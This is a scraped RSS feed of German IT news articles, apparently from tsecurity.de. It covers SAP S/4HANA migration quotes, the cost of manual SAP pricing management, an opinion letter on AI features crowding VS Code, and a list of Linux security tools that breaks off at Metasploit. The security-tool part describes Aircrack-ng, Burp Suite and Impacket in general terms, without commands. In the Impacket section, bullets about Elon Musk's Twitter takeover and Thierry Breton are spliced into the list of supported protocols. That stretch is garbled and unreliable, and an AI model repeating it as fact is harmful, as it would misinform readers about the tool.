<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Albrecht-Munz-HPE_169.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Albrecht Munz, HPE" class="wp-image-4199942" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Albrecht Munz, HPE: </p> <p>„Die SAP-S/4HANA-Migration ist primär ein erster technischer Pflichtlauf, der die IT seitige Grundlage für die digitale Transformation schaffen kann. Dass viele Unternehmen hier stagnieren, liegt auch am in diesem Zusammenhang häufig anzutreffenden Cloud-Washing: Das Hosting eines ERP-Systems in der Cloud liefert noch lange nicht die Innovations- und Business-Effekte einer wirklich Cloud-nativen SaaS-Architektur.“</p></figcaption></figure><p class="imageCredit">Harald Becker / Hewlett-Packard GmbH</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/01/Anke-Frier_LHIND_TESTIMONIALS_030_16x9.png?w=1024" alt="Anke Frier, Lufthansa Industry Solutions " class="wp-image-3634299" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Anke Frier, Lufthansa Industry Solutions:</p>
<p>„Unternehmen, die sich für eine technische SAP-S/4HANA-Transformation entschieden haben, dürfen diese nicht mit dem Go-Live als abgeschlossen betrachten. Der langfristige Erfolg hängt davon ab, wie konsequent danach die neuen technologischen Möglichkeiten genutzt werden, um Prozesse umzugestalten, zu digitalisieren und durch KI-Einsatz zu unterstützen. Erst dadurch entsteht ein messbarer Business Value.“</p></figcaption></figure><p class="imageCredit">Sonja Brüggemann / Lufthansa Industry Solutions GmbH &amp; Co. KG</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Peter_Buermann_Microsoft_16x9.png?w=1024" alt="Peter Büermann, Microsoft" class="wp-image-4199948" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Peter Büermann, Microsoft:</p>
<p>„Der optimale Zeitpunkt für den Umstieg auf SAP S/4HANA ist jetzt. Die Reife der Migrationswerkzeuge, standardisierte Vorgehensmodelle und die umfangreiche Projekterfahrung der SAP-Partnerlandschaft reduzieren das Risiko deutlich. Damit sind die wesentlichen Hürden vergangener Jahre weitgehend beseitigt und Unternehmen profitieren von einer schnelleren Implementierung, geringeren Kosten und einer höherer Projektqualität.“</p>
</figcaption></figure><p class="imageCredit">Microsoft Deutschland GmbH</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Roland_Storbeck_Natuvion_090726_285_16x9.png?w=1024" alt="Roland Storbeck, Natuvion" class="wp-image-4199949" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Roland Storbeck, Natuvion:</p>
<p>„Wirklich erfolgreich sind die SAP-S/4HANA-Migrationen, deren Scope noch vor dem Projektstart klar definiert und gemanagt wird. Wer zu Beginn zu hohe Ansprüche hat und jeden Prozess umdrehen will, dessen Vorhaben scheitert häufig schon in der Konzeptionsphase. Zudem muss jedes Unternehmen die Frage beantworten, wie viel Change seine IT- und Business-Organisation überhaupt verträgt. Neben einem klaren Scope ist dringend zu empfehlen, den eigenen Datenbestand vor Projektstart zu analysieren und aufzuräumen.“</p>
</figcaption></figure><p class="imageCredit">VOGUS – Wolfgang Voglhuber / Natuvion GmbH</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Matthias-Draschner_smartshift.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Matthias Draschner, smartShift" class="wp-image-4199950" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Matthias Draschner, smartShift:</p>
<p>„Für viele Unternehmen ist SAP in erster Linie eine über Jahre oder sogar Jahrzehnte gewachsene IT-Landschaft, die geschäftskritische Prozesse unterstützt und absichert. Entsprechend besteht die berechtigte Erwartung, dass diese Prozesse auch nach der Migration auf SAP S/4HANA zuverlässig und möglichst unverändert weiterlaufen. Gleichzeitig bietet die SAP-S/4HANA-Transformation die Chance, Custom Code entweder zu modernisieren und auf die Anforderungen einer Cloud-fähigen Architektur auszurichten oder zu entfernen, sofern er nicht mehr benötigt wird. Spezielle Analyse- und Automatisierungstools unterstützen diesen Prozess.“</p>
</figcaption></figure><p class="imageCredit">smartShift Technologies GmbH</p></div>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Preismanagement in SAP – der unterschätzte Kostentreiber]]></title>
<description><![CDATA[Manuelle Prozesse beim SAP-Preismanagement sind ein häufig unterschätzter Kostentreiber.  Ahmet Misirligul/Shutterstock



Die margenschwache europäische Automobilzulieferindustrie, für die Roland Berger und Lazard eine EBIT-Marge von im Schnitt 3,6 Prozent ermittelten, steht von mehreren Seiten ...]]></description>
<link>https://tsecurity.de/de/3687935/it-security-nachrichten/preismanagement-in-sap-der-unterschaetzte-kostentreiber/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687935/it-security-nachrichten/preismanagement-in-sap-der-unterschaetzte-kostentreiber/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/shutterstock_2569463443_16.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Berechnung, Excel, Preis, Taschenrechner" class="wp-image-4196197" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Manuelle Prozesse beim SAP-Preismanagement sind ein häufig unterschätzter Kostentreiber.<br> </figcaption></figure><p class="imageCredit"> Ahmet Misirligul/Shutterstock</p></div>



<p class="wp-block-paragraph">Die margenschwache europäische Automobilzulieferindustrie, für die <a href="https://www.lazard.com/media/ibmev4k4/german-press-release-global-automotive-supplier-study-average-industry-profit-margin-drops.pdf" target="_blank" rel="noreferrer noopener">Roland Berger und Lazard</a> eine EBIT-Marge von im Schnitt 3,6 Prozent ermittelten, steht von mehreren Seiten unter Druck. Die Transformation zur E-Mobilität bindet Kapital, Produkt- und Modellzyklen verkürzen sich, und seit der Corona-Pandemie sind Lieferketten volatiler geworden sowie Energie-, Material- und Finanzierungskosten gestiegen.</p>



<p class="wp-block-paragraph">Großen Druck üben auch die Automobilhersteller (OEMs) durch enge Preisvorgaben und die regelmäßige Anpassung vereinbarter Preise (Preis-Updates) aus. Zugleich fordern sie zwei bis drei Prozent Produktivitätssteigerung pro Jahr, die Zulieferer meist in Form einer Preissenkung weitergeben. Ein fehlerfreies Preismanagement ist für Zulieferer daher eine wichtige Voraussetzung, um Margen-Killer wie Nachbelastungen und Vertragsstrafen der OEMs oder im schlimmsten Fall einen Auftragsverlust zu vermeiden.</p>



<h2 class="wp-block-heading">Lücken im SAP-Standard führen zu manuellen Prozessen</h2>



<p class="wp-block-paragraph">Genau hier liegt das Problem, speziell für Zulieferer, die Preise, Rabatte und Konditionen in SAP S/4HANA oder SAP ERP verwalten. Da der SAP-SD-Standard Funktionslücken bei Preisanpassungen und beim Import von Preis-Updates aufweist, werden viele Prozessschritte manuell ausgeführt, häufig in Excel.</p>



<p class="wp-block-paragraph">Daten zwischen Excel und SAP einzugeben und hin- und her zu kopieren, ist zeitraubend und fehleranfällig. Zugleich geht es zulasten der Datenqualität, weil Preisdaten nicht einheitlich und auch häufig mit großem Zeitverzug in SAP eingepflegt werden. Oft vergehen Tage oder sogar Wochen, bis die getätigten Lieferungen mit den neuen Preisen abgerechnet werden können.</p>



<p class="wp-block-paragraph">Das alles sind oft unterschätzte Kostentreiber. Besonders deutlich wird das bei Preisanpassungen. Schon ein mittelständischer Zulieferer verwaltet oft mehrere tausend Konditionssätze, vom Grundpreis über Rohstoffzuschläge bis zu kundenindividuellen Rabatten. Da jeder Preisbestandteil in SAP als eigener Konditionssatz geführt wird und der Standard keine Massenänderungen erlaubt, müssen die Sätze einzeln geöffnet, geprüft und bearbeitet werden. Das summiert sich rasch auf tausende manuelle Eingriffe, wobei jeder Vorgang abhängig von der Komplexität drei bis 15 Minuten dauert. Es fehlt zudem eine konsolidierte Sicht auf Preisstrukturen und die Möglichkeit, Preisänderungen vorab zu simulieren.</p>



<p class="wp-block-paragraph">Auch der Import von Preis-Updates, die OEMs wahlweise als Excel-, XML- und CSV-Datei oder per IDoc übermitteln, erfolgt wegen Lücken im SAP-Standard von Hand und dauert etwa zwei bis vier Minuten pro Datensatz. Da automatische Plausibilitäts-, Toleranz- und Kollisionsprüfungen fehlen, führen Mitarbeitende diese ebenfalls manuell durch, was die Bearbeitungszeit zusätzlich verlängert und das Fehlerrisiko erhöht.</p>



<h2 class="wp-block-heading">Was die manuellen Preisprozesse in SAP wirklich kosten</h2>



<p class="wp-block-paragraph">Weil sich dieser Aufwand und damit die Kosten auf zahlreiche Mitarbeitende, Dutzende von Konditionsarten und tausende Einzelbuchungen verteilt, taucht er im Controlling meist nicht als eigener Posten auf. Zulieferer tappen somit im Dunkeln, was manuelle Preisprozesse sie wirklich kosten. Diese Intransparenz kann sich in einer Branche mit derart knappen Margen kaum ein Unternehmen leisten.</p>



<p class="wp-block-paragraph">Ein Berechnungsbeispiel aus der Praxis macht die Größenordnung deutlich. Ein mittelgroßer Zulieferer mit 500 bis 1.500 Beschäftigten, der pro Jahr 5.500 Konditionssätze für Preisanpassungen und 4.500 Datensätze für Preis-Updates bearbeitet und je Satz im Schnitt neun beziehungsweise drei Minuten benötigt, kommt in Summe auf 1.050 Arbeitsstunden jährlich. Bei Arbeitskosten von 62 Euro pro Stunde (Stand: 2023), wie sie laut dem <a href="https://www.vda.de/de/themen/automobilindustrie/marktentwicklungen/produktion-der-deutschen-automobilindustrie-internationalisiert-sich-weiter" target="_blank" rel="noreferrer noopener">Verband der Automobilindustrie (VDA)</a> in Deutschland branchenüblich sind, entstehen direkte Kosten von etwas mehr als <strong>65.000 Euro</strong>.</p>



<p class="wp-block-paragraph">Die direkten Kosten sind jedoch nur ein Teil der Belastung. Nicht zu unterschätzen sind auch indirekte Kosten, die durch Fehler beim Preismanagement entstehen. Sie erfordern aufwendige Nacharbeit, interne Abstimmungen oder Gespräche mit OEM-Kunden, und führen oft zu teuren Nachbelastungen. Bei einer Fehlerquote, die in der Praxis beim manuellen Preisdatenimport zwei bis vier Prozent und bei Preisanpassungen zwei bis drei Prozent beträgt, schlagen diese Folgekosten mit <strong>20.000 bis 30.000 Euro</strong> zu Buche. Damit liegt die wirtschaftliche Gesamtbelastung bei rund <strong>85.000 bis 95.000 Euro im Jahr</strong>.</p>



<h2 class="wp-block-heading">Drei Optionen: Customizing, Eigenentwicklung und Add-on</h2>



<p class="wp-block-paragraph">Der Aufwand und die Folgekosten manueller Prozesse bei Preisanpassungen und Preis-Updates durch Lücken im SAP-Standard sind also hoch. Abteilungs- und Teamleiter im Vertriebsinnendienst und in der Fakturierung sollten daher nach Wegen suchen, diese Lücken ohne den Einsatz einer Third-Party-Lösung zu schließen. Innerhalb der SAP-Welt bleiben drei Optionen.</p>



<ol class="wp-block-list">
<li><strong>Optimierung des SAP-Standards durch Customizing und ein stärkerer Batch-Einsatz:</strong> Sie bringt nur einen Effizienzgewinn von zehn bis 20 Prozent und spart 8.000 bis 15.000 Euro pro Jahr, auch weil Funktionen für Massenänderungen und Simulationen weiterhin fehlen.</li>
</ol>



<ul class="wp-block-list">
<li><strong>Individuelle SAP-Erweiterung:</strong> Sie bietet Flexibilität, ist aber durch Entwicklungskosten bis in den sechsstelligen Euro-Bereich, Projektlaufzeiten von sechs bis 24 Monaten, den hohen Wartungsaufwand und die Abhängigkeit von einzelnen Entwicklern selten wirtschaftlich.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Einsatz SAP-basierter Add-ons und Partnerlösungen:</strong> Sie fügen sich in das vorhandene SAP-System ein, nutzen SAP-Standardtabellen, schließen Prozesslücken modifikationsfrei und bieten meist das beste Kosten-Nutzen-Verhältnis. Empirische Werte zeigen, dass ein spezielles Preispflege-Add-on mit einer zentralen Sicht auf alle Preisbestandteile und What-if-Simulationen die Bearbeitung von drei bis 15 Minuten auf wenige Sekunden verkürzt. Die dadurch möglichen Einsparungen in Bezug auf Prozess- und Arbeitskosten liegen im Schnitt zwischen 50.000 und 85.000 Euro pro Jahr. Bei einer Implementierungszeit von in der Regel vier bis acht Wochen und Investitionskosten von 30.000 bis 60.000 Euro, amortisiert sich der Einsatz eines solchen Add-ons dann erfahrungsgemäß meist binnen eines Jahres.</li>
</ul>



<h2 class="wp-block-heading">Vom Kostentreiber zum Wettbewerbsfaktor</h2>



<p class="wp-block-paragraph">Zulieferer, die Prozesslücken im SAP-Preismanagement schließen, profitieren somit gleich mehrfach.</p>



<ul class="wp-block-list">
<li>Der <strong>Wegfall von Kostentreibern</strong> und ein <strong>schneller ROI</strong> erhöhen die Liquidität und schaffen Spielraum für strategische Investitionen, etwa in Forschung und Entwicklung oder den Kundenservice.</li>
</ul>



<ul class="wp-block-list">
<li>Durch straffere, nahezu fehlerfreie Abläufe gewinnen Mitarbeitende in Vertriebsinnendienst und Fakturierung mehr Zeit für wertschöpfende Tätigkeiten wie Konditionsverhandlungen, Preisanalysen oder die Sicherung der Datenqualität. Zugleich können sie auf neue OEM-Anforderungen zeitnah reagieren.</li>
</ul>



<p class="wp-block-paragraph">In einer margenschwachen Branche mit anhaltendem Preisdruck wird daraus ein Wettbewerbsfaktor. So entscheidet ein im Tagesgeschäft zunächst unterschätzter Kostentreiber am Ende über die strategische Position eines Zulieferers. (mb)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Visual Studio Code hat ein KI-Problem]]></title>
<description><![CDATA[>Wenn der „Wutball“ zum neuen Standard-“Add-On” für Visual Studio Code mutiert…Apichart Poemchawalit | shutterstock.com



Liebe Microsoft-Entscheider,



Ich möchte keine Hassliebe zu Visual Studio Code (VS Code) entwickeln. Aber ihr macht es mir wirklich schwer. Früher war VS Code einfach nur e...]]></description>
<link>https://tsecurity.de/de/3687934/it-security-nachrichten/visual-studio-code-hat-ein-ki-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687934/it-security-nachrichten/visual-studio-code-hat-ein-ki-problem/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">Wenn der „Wutball“ zum neuen Standard-“Add-On” für Visual Studio Code mutiert…</figcaption></figure><p class="imageCredit">Apichart Poemchawalit | shutterstock.com</p></div>



<p class="wp-block-paragraph">Liebe Microsoft-Entscheider,</p>



<p class="wp-block-paragraph">Ich möchte keine Hassliebe zu <a href="https://www.computerwoche.de/article/4123522/visual-studio-code-langweilig-aber-noch-on-top.html" target="_blank">Visual Studio Code</a> (VS Code) entwickeln. Aber ihr macht es mir wirklich schwer. Früher war VS Code einfach nur ein Editor, den man mit Hilfe von Add-Ons genau so konfiguriert hat, wie man es brauchte oder wollte. Deshalb habe ich das Tool bisher auch wirklich gerne für diverse Dev-Aufgaben in unterschiedlichen Programmiersprachen genutzt. Zum Beispiel, um:</p>



<ul class="wp-block-list">
<li>mit Extensions einen Python-Workflow aufzusetzen, der <a href="https://www.computerwoche.de/article/3497295/datenbank-how-to-fur-app-entwickler.html" target="_blank">Datenbankfunktionen</a> erschließt,</li>



<li>eine Umgebung für das digitale Publishing von Büchern zu erstellen, oder</li>



<li>ein Screenwriting-Projekt einzurichten.</li>
</ul>



<p class="wp-block-paragraph">Natürlich geht all das auch noch heute. Aber: <em>Buchstäblich jede neue Funktion</em> in Visual Studio Code dreht sich heute nur noch um ein Thema: KI. Das hat inzwischen Ausmaße angenommen, angesichts derer ich mir die Frage stelle, ob in Eurem Unternehmen überhaupt noch jemand am eigentlichen Editor arbeitet.</p>



<p class="wp-block-paragraph">Die <a href="https://code.visualstudio.com/updates/v1_127" target="_blank" rel="noreferrer noopener">Release-Notes zu VS Code 1.127</a> sind ein gutes Beispiel: Abgesehen von einer Funktion, dreht sich auch hier alles nur um Agenten und Large Language Models (<a href="https://www.computerwoche.de/article/4155050/25-fragen-die-zum-richtigen-llm-fuhren.html" target="_blank">LLMs</a>). Gleiches gilt auch für <a href="https://code.visualstudio.com/updates/v1_126" target="_blank" rel="noreferrer noopener">die Vorgängerversion</a>. Der Trend ist klar erkennbar: VS Code entwickelt sich rasant weiter, vor allem in Richtung Frontend für Agenten. Alles andere scheint erst einmal nachrangig.</p>



<p class="wp-block-paragraph">Manche mögen argumentieren, dass Microsofts Dev-Tool inzwischen so ausgereift ist, dass es an den Kernfunktionalitäten nicht mehr viel zu optimieren gibt – weshalb der Fokus nun eben vor allem darauf liegt, neue Nutzer über den KI-Trend anzuziehen. Das ist allerdings kein Grund dafür, dass all diese KI-Funktionen auf IDE-Ebene integriert werden müssen. Meiner Meinung nach sollte Euer Fokus eher darauf liegen, die native Erweiterbarkeit von VS Code zu fördern – statt keinen Stein auf dem anderen zu lassen, nur um KI-Funktionen zu nativen Elementen zu machen.</p>



<p class="wp-block-paragraph">Im Grunde geht es Euch in meinen Augen vor allem darum, Visual Studio Code zum ersten Anlaufpunkt für KI zu machen – insbesondere für GitHub Copilot. Allerdings rückt so aus meiner Perspektive die Entwicklererfahrung zugunsten der Allgegenwärtigkeit von KI in den Hintergrund. Wenn Ihr wirklich glaubt, dass jeder User von VS Code ein „Agentic Development Environment“ (<a href="https://www.infoworld.com/article/4193975/the-ide-is-dead-long-live-the-ade.html" target="_blank">ADE</a>) einer IDE vorzieht, liegt Ihr in meinen Augen völlig falsch.</p>



<p class="wp-block-paragraph">KI-Tools werden zwar nicht wieder verschwinden. Ich glaube aber durchaus, dass es künftig zu einer Konsolidierung kommen wird.  Frontier-Modelle, die alles können und noch sechs weitere Features obendrauf packen, werden sich bald nur noch nur für große Anbieter lohnen, die ein Netz aus API-„Mautstellen“ darum herum errichten – und genug Geld haben, um entsprechende Rechenzentren zu betreiben.</p>



<p class="wp-block-paragraph">Der allgemeine Trend geht bei KI eher hin zu kleineren, lokal gehosteten Modellen, die <a href="https://www.computerwoche.de/article/4173136/17-llms-fur-spezialdomanen.html" target="_blank">spezialisierte Tasks</a> bewältigen – und mit deutlich weniger Aufwand zu trainieren, bereitzustellen und zu betreiben sind. Es macht also echt wenig Sinn, das Pferd hinter den Karren zu spannen – wie bei den nativen KI-Funktionen von VS Code.</p>



<p class="wp-block-paragraph">Gleichzeitig habe ich die Hoffnung, dass es nicht mehr so lange dauert, bis die KI-Funktionen wieder aus Visual Studio Code herausgelöst und in ein Add-On verfrachtet werden. Bis es so weit ist, bleibt mir wohl nur, mich damit abzufinden, dass mein Lieblings-Editor zunehmend mit KI-Funktionen vollgestopft wird – ganz gleich, ob sie für meinen Anwendungsfall überhaupt Sinn machen oder nicht. Immerhin ist es (noch) <a href="https://code.visualstudio.com/docs/supporting/FAQ#_can-i-disable-ai-functionality-in-vs-code" target="_blank" rel="noreferrer noopener">möglich</a>, das ganze KI-Zeug in VS Code <a href="https://www.computerwoche.de/article/4196026/das-nachste-killer-feature-fur-ki.html" target="_blank">zu deaktivieren</a>.</p>



<p class="wp-block-paragraph">Während ich diesen Text hier schreibe, habe ich gerade das Update auf VS Code 1.128 erhalten. Das enthält eine nutzwertige Funktion, die ich sicher oft nutzen werden: <a href="https://code.visualstudio.com/updates/v1_128#_os-level-keyboard-shortcuts" target="_blank" rel="noreferrer noopener">die Möglichkeit, Tastatur-Shortcuts auf Betriebssystemebene</a> einzurichten. Ansonsten dreht sich auch bei diesem Update alles nur um eines: KI.</p>



<p class="wp-block-paragraph">Besinnt Euch darauf, was Visual Studio Code groß gemacht hat – ansonsten riskiert Ihr auf lange Sicht, Benutzer zu verlieren.</p>



<p class="wp-block-paragraph">Liebe Grüße,</p>



<p class="wp-block-paragraph">ein genervter Visual-Studio-Code-Poweruser.</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist </strong><a href="https://www.infoworld.com/article/4197387/dear-microsoft-stop-sticking-your-ai-in-my-ide.html" target="_blank"><strong>im Original</strong></a><strong> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[10 Linux-Pflicht-Tools für Netzwerk- und Security-Profis]]></title>
<description><![CDATA[Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. 
					Foto: Omelchenko – shutterstock.com




Eine Wahl zu treffen, wenn Dutzende oder gar Hunderte von Tools zur Verfügung stehen, ist nicht einfach. So dürfte es auch vielen Netzwerk- und Security-Experten gehen, di...]]></description>
<link>https://tsecurity.de/de/3687932/it-security-nachrichten/10-linux-pflicht-tools-fuer-netzwerk-und-security-profis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687932/it-security-nachrichten/10-linux-pflicht-tools-fuer-netzwerk-und-security-profis/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. " title="Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. " src="https://images.computerwoche.de/bdb/3340356/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. </p></figcaption></figure><p class="imageCredit">
					Foto: Omelchenko – shutterstock.com</p></div>




<p class="wp-block-paragraph">Eine Wahl zu treffen, wenn Dutzende oder gar Hunderte von Tools zur Verfügung stehen, ist nicht einfach. So dürfte es auch vielen Netzwerk- und <a href="https://www.csoonline.com/de/" title="Security-Experten" target="_blank">Security-Experten</a> gehen, die quelloffene Security Tools für <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a> suchen.</p>



<p class="wp-block-paragraph">In diesem Bereich gibt es eine Vielzahl verschiedener Tools für so gut wie jede Aufgabe (Netzwerk-Tunneling, Sniffing, Scanning, Mapping) und jede Umgebung (Wi-Fi-Netzwerke, Webanwendungen, Datenbankserver). Wir haben einige Experten konsultiert und zehn essenzielle <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>-Sicherheitstools für Sie zusammengestellt.</p>



<h2 class="wp-block-heading">1. <a href="https://www.aircrack-ng.org/" target="_blank" rel="noreferrer noopener">Aircrack-ng</a></h2>



<p class="wp-block-paragraph">Diese Suite von Software Tools ermöglicht es, drahtlose Netzwerke und WiFi-Protokolle Sicherheitsüberprüfungen zu unterziehen. Sicherheitsprofis verwenden das Tool für die Netzwerkadministration, Hacking und Penetrationstests. Dabei fokussiert Aircrack-ng auf:</p>



<ul class="wp-block-list">
<li><p>Monitoring (Datenpakete erfassen und Daten in Textdateien zur Weiterverarbeitung durch Tools von Drittanbietern exportieren)</p></li>



<li><p>Angreifen (Replay-Angriffe, Deauthentication, Packet Injection)</p></li>



<li><p>Testing (WiFi-Karten und Treiberfunktionen überprüfen) und</p></li>



<li><p>Cracking (WEP und WPA PSK)</p></li>
</ul>



<p class="wp-block-paragraph">Laut der <a href="https://www.aircrack-ng.org/" title="offiziellen Webseite" target="_blank" rel="noopener">offiziellen Webseite</a> funktionieren alle Tools kommandozeilenbasiert, was eine umfangreiche Skripterstellung ermöglicht. Das Tool funktioniert mit <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a> genauso wie mit <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>, macOS, FreeBSD, OpenBSD, NetBSD, Solaris und sogar eComStation.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">2. <a href="https://portswigger.net/burp/pro" target="_blank" rel="noreferrer noopener">Burp Suite</a></h2>



<p class="wp-block-paragraph">Hierbei handelt es sich um eine Testing-Suite für Webanwendungen, die für Security Assessments von Websites eingesetzt wird. Burp Suite arbeitet als lokale Proxy-Lösung, die es Sicherheitsexperten ermöglicht, Anfragen (HTTP/Websockets) und Antworten zwischen einem Webserver und einem Browser</p>



<ul class="wp-block-list">
<li><p>entschlüsseln,</p></li>



<li><p>beobachten,</p></li>



<li><p>manipulieren und</p></li>



<li><p>wiederholen zu können.</p></li>
</ul>



<p class="wp-block-paragraph">Burp Suite hat einen passiven Scanner an Bord, mit dem Security-Profis Webseiten (manuell) auf potenzielle Schwachstellen überprüfen können. Die Pro-Version bietet außerdem einen sehr nützlichen aktiven Web-Schwachstellen-Scanner, mit dem sich weitere Schwachstellen aufspüren lassen. Burp Suite ist über Plugins erweiterbar, so dass Sicherheitsexperten ihre eigenen Erweiterungen entwickeln können.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> Die Professional-Version kostet 475 Euro pro Jahr und Benutzer. Darüber hinaus steht auch eine Enterprise-Version (ab ca. 2.000 Euro jährlich) zur Verfügung, die mehrere gleichzeitige Scans ermöglicht und von Anwendungsentwicklungsteams genutzt werden kann.</p>



<h2 class="wp-block-heading">3. <a href="https://github.com/fortra/impacket" target="_blank" rel="noreferrer noopener">Impacket</a></h2>



<p class="wp-block-paragraph">Diese Sammlung von Tools ist für Pen-Tests von Netzwerkprotokollen und -diensten unerlässlich. Impacket wurde von SecureAuth entwickelt und ist eine Sammlung von Python Classes, um mit Netzwerkprotokollen zu arbeiten. Impacket konzentriert sich auf die Bereitstellung von Low-Level-Zugriff auf Pakete und bei einigen Protokollen wie SMB1-3 und MSRPC auf die Protokollimplementierung selbst. Sicherheitsexperten können Pakete von Grund auf neu konstruieren, aber auch auf Grundlage geparster Rohdaten. Die objektorientierte <a title="API" href="https://www.computerwoche.de/article/2790525/was-sie-ueber-application-programming-interfaces-wissen-muessen.html" target="_blank">API</a> macht es zudem einfach, mit tiefen Protokollhierarchien zu arbeiten. Impacket unterstützt die folgenden Protokolle:</p>



<ul class="wp-block-list">
<li><p>Ethernet, Linux;</p></li>



<li><p>IP, TCP, UDP, ICMP, IGMP, ARP;</p></li>



<li><p>IPv4 und IPv6;</p></li>



<li><p>Umgänglicher zeigte sich Musk gegenüber den Anzeigenkunden von Twitter. In einem – natürlich auf Twitter geposteten – Brief erklärte der Tesla-Chef, der Grund für die Übernahme sei nicht, damit noch mehr Geld zu verdienen. Vielmehr sei es “wichtig für den Fortbestand der Zivilisation, einen gemeinsamen digitalen Treffpunkt zu haben, auf dem eine breite Palette von Überzeugungen auf gesunde Weise diskutiert werden kann.” </p></li>



<li><p>Trotz alledem dürfe Twitter nicht zu einer “für alle Nutzer freien Höllenlandschaft werden, in der alles ohne Konsequenzen gesagt werden kann”, fügte Musk hinzu. Zusätzlich zur Einhaltung der Gesetze müsse die Plattform “warmherzig und einladend” für alle sein und den Nutzern die Möglichkeit bieten, “die gewünschte Erfahrung nach ihren Vorlieben zu wählen” – ähnlich wie man zum Beispiel wählen kann, Filme zu sehen oder Videospiele zu spielen, die für alle Altersgruppen geeignet sind.</p></li>



<li><p>Plain-, NTLM- und Kerberos-Authentifizierungen, unter Verwendung von Kennwörtern/Hashes/Tickets/Schlüsseln;</p></li>



<li><p>EU-Kommissar Thierry Breton wiederum reagierte auf Musks Teet, dass der Vogel jetzt frei sein, mit der Anmerkung, “dass Twitter in Europa nach unseren Regeln fliegen muss”.</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Preis:</strong> Kostenlos – Impacket wird unter einer leicht modifizierten Version der Apache Software License bereitgestellt. Die Unterschiede können Sie <a href="https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/LICENSE" title="hier einsehen" target="_blank" rel="noopener">hier einsehen</a>.</p>



<h2 class="wp-block-heading">4. <a href="https://www.metasploit.com/" target="_blank" rel="noreferrer noopener">Metasploit</a></h2>



